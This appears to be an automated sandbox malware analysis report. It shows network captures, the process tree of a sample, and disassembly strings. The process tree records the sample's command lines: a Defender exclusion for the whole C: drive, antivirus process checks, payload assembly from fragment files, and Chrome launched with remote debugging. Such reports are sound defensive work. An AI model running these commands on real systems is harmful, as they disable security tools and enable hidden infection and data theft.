2024-12-04 11:17:56 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49898	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:57 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:58 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:57 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 577422f4-d01e-00ad-48c3-45e942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111757Z-1746fd949bdnq7x2hC1EWRpxr000000001100000000026e7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:58 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49901	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:58 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:58 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:58 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: 00b55cb5-a01e-000d-73cc-45d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111758Z-1746fd949bdlqd7fhC1EWR6vt000000001b0000000002n0a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:58 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49899	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:58 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:58 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:58 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 2b71c36d-501e-008c-14c5-45cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111758Z-1746fd949bdmv56chC1EWRypnn0000000160000000007rhb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:58 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Target ID:	0
Start time:	06:15:57
Start date:	04/12/2024
Path:	C:\Users\user\Desktop\xoJxSAotVM.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\xoJxSAotVM.exe"
Imagebase:	0x7ff6b18b0000
File size:	2'010'112 bytes
MD5 hash:	135436F1AE4E69F5098F8E74E3106863
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:15:57
Start date:	04/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:15:58
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:16:01
Start date:	04/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:16:06
Start date:	04/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C C:\ProgramData\din.exe
Imagebase:	0x7ff6e67e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:16:06
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:16:06
Start date:	04/12/2024
Path:	C:\ProgramData\din.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\din.exe
Imagebase:	0x400000
File size:	1'188'347 bytes
MD5 hash:	E3ADDF3612513EBE5830CD5C7C6F0E22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 38%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:16:06
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:16:06
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x800000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:16:07
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd50000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:16:07
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x6d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:16:08
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd50000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:16:08
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x6d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:16:08
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 112974
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:16:08
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "ApplianceFellowshipWhileRegistry" Beverly
Imagebase:	0x6d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:16:09
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Bulgarian + ..\Apply + ..\Legs + ..\Rules + ..\Vat + ..\July + ..\Gamma + ..\Geographic r
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:16:09
Start date:	04/12/2024
Path:	C:\Users\user\AppData\Local\Temp\112974\Decade.com
Wow64 process (32bit):	true
Commandline:	Decade.com r
Imagebase:	0xd10000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	06:16:09
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x510000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:17:16
Start date:	04/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff70f330000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:17:17
Start date:	04/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	06:17:17
Start date:	04/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2564,i,11302442274769485425,11436489029941999890,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	86

Executed Functions

Function 00007FF6B19B22D0 Relevance: 196.5, APIs: 102, Strings: 8, Instructions: 3974memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6B19BAC72,0000000E,?,?,00000000,?,?,?,00007FF6B19B3793), ref: 00007FF6B19B23CC
HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6B19BAC72,0000000E,?,?,00000000,?,?,?,00007FF6B19B3793), ref: 00007FF6B19B24C4
HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6B19BAC72,0000000E,?,?,00000000,?,?,?,00007FF6B19B3793), ref: 00007FF6B19B25F2
HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6B19BAC72,0000000E,?,?,00000000,?,?,?,00007FF6B19B3793), ref: 00007FF6B19B261F
GetEnvironmentStringsW.KERNEL32 ref: 00007FF6B19B26E7

Strings

\?\\, xrefs: 00007FF6B19B3397
.exeprogram not found, xrefs: 00007FF6B19B355C
#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid, xrefs: 00007FF6B19B5E92
\cmd.exemaximum number of ProcThreadAttributes exceeded, xrefs: 00007FF6B19B497C, 00007FF6B19B49BD
]?\\, xrefs: 00007FF6B19B339F
assertion failed: self.height > 0, xrefs: 00007FF6B19B6BA0
PATHstd\src\sys_common\wtf8.rsassertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FF6B19B5934
internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 00007FF6B19B6B83, 00007FF6B19B6BBD, 00007FF6B19B6BF5, 00007FF6B19B6C12, 00007FF6B19B6C2F

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$EnvironmentStrings
String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHstd\src\sys_common\wtf8.rsassertion failed: is_code_point_boundary(self, new_len)$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: self.height > 0$internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
API String ID: 2767186067-2834685591
Opcode ID: 77bcd8abfbdd6a946830fabe77f4233693a6dbb6b88eea764a49695e8b5f506b
Instruction ID: f7a3e5e07c2eff6a4e2e9228b95ecaeb3e878187025354a3e03bc9d4a89351ec
Opcode Fuzzy Hash: 77bcd8abfbdd6a946830fabe77f4233693a6dbb6b88eea764a49695e8b5f506b
Instruction Fuzzy Hash: A2939362A18BD299EB709F29D8443FE27A1FB4579CF444136CB5D9BB96DF38A241C300

Function 00007FF6B18CBBFD Relevance: 111.1, APIs: 49, Strings: 12, Instructions: 4384COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF6B18CBCF6

Strings

base64 is always valid HeaderValueC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\reqwest-0.12.9\src\util.rs, xrefs: 00007FF6B18D1976
Pending error polled more than once, xrefs: 00007FF6B18D1946
cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs, xrefs: 00007FF6B18D1B99
FAILEDOk: (verification: ):, xrefs: 00007FF6B18D15B4
Parsed Url is not a valid Urioperation timed outURL scheme is not allowedBuilderRequestRedirectStatusBodyDecodeUpgrade, xrefs: 00007FF6B18CE986
has_authority means set_password shouldn't fail, xrefs: 00007FF6B18D1E32
not verifiedThis has been set!, xrefs: 00007FF6B18D0EFA
assertion failed: !urls.is_empty()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\downloader-0.2.8\src\backend.rs, xrefs: 00007FF6B18D1AB9
size overflows MAX_SIZE, xrefs: 00007FF6B18D1662, 00007FF6B18D1699, 00007FF6B18D2001
<unknown>, xrefs: 00007FF6B18CC23A
valid request parts, xrefs: 00007FF6B18D1DD6
has_authority means set_username shouldn't fail, xrefs: 00007FF6B18D1E62

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CloseHandle
String ID: <unknown>$FAILEDOk: (verification: ):$Parsed Url is not a valid Urioperation timed outURL scheme is not allowedBuilderRequestRedirectStatusBodyDecodeUpgrade$Pending error polled more than once$assertion failed: !urls.is_empty()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\downloader-0.2.8\src\backend.rs$base64 is always valid HeaderValueC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\reqwest-0.12.9\src\util.rs$cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs$has_authority means set_password shouldn't fail$has_authority means set_username shouldn't fail$not verifiedThis has been set!$size overflows MAX_SIZE$valid request parts
API String ID: 2962429428-2171222100
Opcode ID: a063349ff88b106b7827fa235683050f411b4eabbc03772c4744305baf5672c8
Instruction ID: ca467ec78c413b53a0f5df76c8a72719461004679657c22396f9b9bbc8dce044
Opcode Fuzzy Hash: a063349ff88b106b7827fa235683050f411b4eabbc03772c4744305baf5672c8
Instruction Fuzzy Hash: 9BC35B76A08BC595E7418F29D4443E937A5FB89B8CF088236DF8C9B399DF399195C320

Function 00007FF6B192B330 Relevance: 69.5, APIs: 32, Strings: 11, Instructions: 4997COMMON

Download Yara Rule

Strings

00current header name, xrefs: 00007FF6B193046F
setybdet, xrefs: 00007FF6B192EEBA
assertion failed: slot.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs, xrefs: 00007FF6B19315C3
CHUNK_SIZE_MAX_BYTES should fit any usize, xrefs: 00007FF6B19316E7, 00007FF6B1931BB1
arenegyl, xrefs: 00007FF6B192EEAD
connection errorC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-1.5.1\src\client\dispatch.rsenvelope not dropped, xrefs: 00007FF6B1930FEB
modnarod, xrefs: 00007FF6B192EEA0
uespemos, xrefs: 00007FF6B192EE90
size overflows MAX_SIZE, xrefs: 00007FF6B19319D6
assertion failed: cnt <= self.limit, xrefs: 00007FF6B1931AE5
trailers, xrefs: 00007FF6B192CDAA

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: 00current header name$CHUNK_SIZE_MAX_BYTES should fit any usize$arenegyl$assertion failed: cnt <= self.limit$assertion failed: slot.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs$connection errorC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-1.5.1\src\client\dispatch.rsenvelope not dropped$modnarod$setybdet$size overflows MAX_SIZE$trailers$uespemos
API String ID: 0-441882696
Opcode ID: af23a775a3e1e311a0c9c8a44a3da2a61b190a138764ee71dc11f44440ee5ec4
Instruction ID: b37c7f38f85654ecb497df858ffb91f5f22699109091296cd1468b8a453b23fd
Opcode Fuzzy Hash: af23a775a3e1e311a0c9c8a44a3da2a61b190a138764ee71dc11f44440ee5ec4
Instruction Fuzzy Hash: 75C37062A09BC299E7719F29D8443ED33A0FB4578CF445136CB9D9B79ADF38A285C340

Function 00007FF6B193B231 Relevance: 37.8, APIs: 20, Strings: 1, Instructions: 1074memoryencryptionCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B193B330
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B193B3AC
CertCloseStore.CRYPT32 ref: 00007FF6B193B3B8
HeapFree.KERNEL32 ref: 00007FF6B193B3D8
HeapFree.KERNEL32 ref: 00007FF6B193CB0C

Strings

future polled after completion, xrefs: 00007FF6B193C92B, 00007FF6B193C979

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Free$Heap$Cert$CertificateCloseContextStore
String ID: future polled after completion
API String ID: 77062578-291733529
Opcode ID: 829f8cd180171ad52d862318de81fcb200bff6ef0ec59b74379b390dccbd49d8
